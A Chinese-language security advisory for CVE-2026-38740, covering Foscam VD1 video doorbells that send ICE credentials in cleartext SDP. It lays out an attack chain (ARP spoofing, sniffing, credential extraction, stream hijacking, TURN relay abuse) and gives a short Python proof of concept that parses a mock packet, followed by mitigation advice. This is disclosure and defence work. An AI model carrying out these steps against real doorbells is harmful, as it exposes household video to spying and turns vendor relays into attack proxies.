CVE-2026-38740 CVSS 5.3 中危

CVE-2026-38740 Foscam敏感信息明文传输漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-38740

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Foscam VD1 Video Doorbell

漏洞概述

Foscam VD1 Video Doorbell在V5.3.13_1072版本之前的固件存在敏感信息明文传输漏洞。该设备在网络接口上以明文形式传输敏感的会话描述协议（SDP）数据，其中包含ICE（交互式连接建立）凭证和候选者信息。由于缺乏加密保护，任何具有网络可见性的攻击者均可拦截这些凭证。利用这些信息，攻击者不仅可以劫持设备的媒体流进行窥探，还可以通过身份验证连接到Foscam的TURN/中继基础设施，利用供应商资源转发任意流量，造成隐私泄露及资源滥用。

技术细节

该漏洞的核心在于Foscam VD1设备在处理实时媒体流协商时，未对SDP（Session Description Protocol）报文实施有效的加密传输机制。SDP报文中包含了WebRTC或类似协议建立P2P连接所需的关键参数，特别是`ice-ufrag`（用户片段）和`ice-pwd`（密码）。攻击者通过ARP欺骗或在集线器/开放Wi-Fi环境下进行被动流量嗅探，即可捕获UDP/TCP数据包中的SDP内容。一旦提取出ICE凭据，攻击者能够模拟合法客户端完成ICE握手，从而接管媒体流会话。此外，由于这些凭据可用于向厂商的TURN服务器请求中继服务，攻击者可将TURN服务器作为匿名代理，隐藏真实来源进行网络扫描或攻击，同时消耗受害者的带宽配额。

攻击链分析

STEP 1

网络嗅探

攻击者接入Foscam设备所在的局域网，使用抓包工具（如Wireshark）监听网络流量。

STEP 2

拦截数据包

识别并捕获设备传输的包含SDP信息的UDP或TCP数据包。

STEP 3

提取凭据

解析SDP内容，从中提取出明文传输的`ice-ufrag`和`ice-pwd`凭证。

STEP 4

会话劫持或滥用

利用提取的凭据连接到TURN服务器或直接劫持P2P连接，获取媒体流控制权或转发恶意流量。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import re

def extract_sdp_creds(packet_payload):
    """
    Simulates parsing a captured network packet containing SDP data.
    Demonstrates extraction of ICE credentials from cleartext.
    """
    # Regex to find ice-ufrag and ice-pwd attributes in SDP
    ufrag_match = re.search(r'a=ice-ufrag:(\S+)', packet_payload)
    pwd_match = re.search(r'a=ice-pwd:(\S+)', packet_payload)

    if ufrag_match and pwd_match:
        return {
            'username': ufrag_match.group(1),
            'password': pwd_match.group(1)
        }
    return None

# Example of captured cleartext SDP data from the network
mock_captured_packet = """
v=0
o=- 168432 2 IN IP4 192.168.1.10
s=Foscam Doorbell Stream
c=IN IP4 192.168.1.10
a=ice-ufrag:9f8d7s6a
a=ice-pwd:VulnerableSecretKey123
a=candidate:1 1 UDP 2130706431 192.168.1.10 50000 typ host
"""

credentials = extract_sdp_creds(mock_captured_packet)

if credentials:
    print(f"[+] Successfully extracted ICE credentials:")
    print(f"    Username: {credentials['username']}")
    print(f"    Password: {credentials['password']}")
    print("[!] An attacker can now use these to hijack the stream or access TURN server.")
else:
    print("[-] No credentials found in packet.")

影响范围

Foscam VD1 Video Doorbell < V5.3.13_1072

防御指南

临时缓解措施

在未升级固件前，建议将Foscam VD1门铃设备连接到独立的访客网络或VLAN中，避免其与不可信设备处于同一广播域。同时，应禁用设备的远程访问功能，仅在必要时通过局域网访问，并定期检查网络流量是否存在异常的数据传输行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表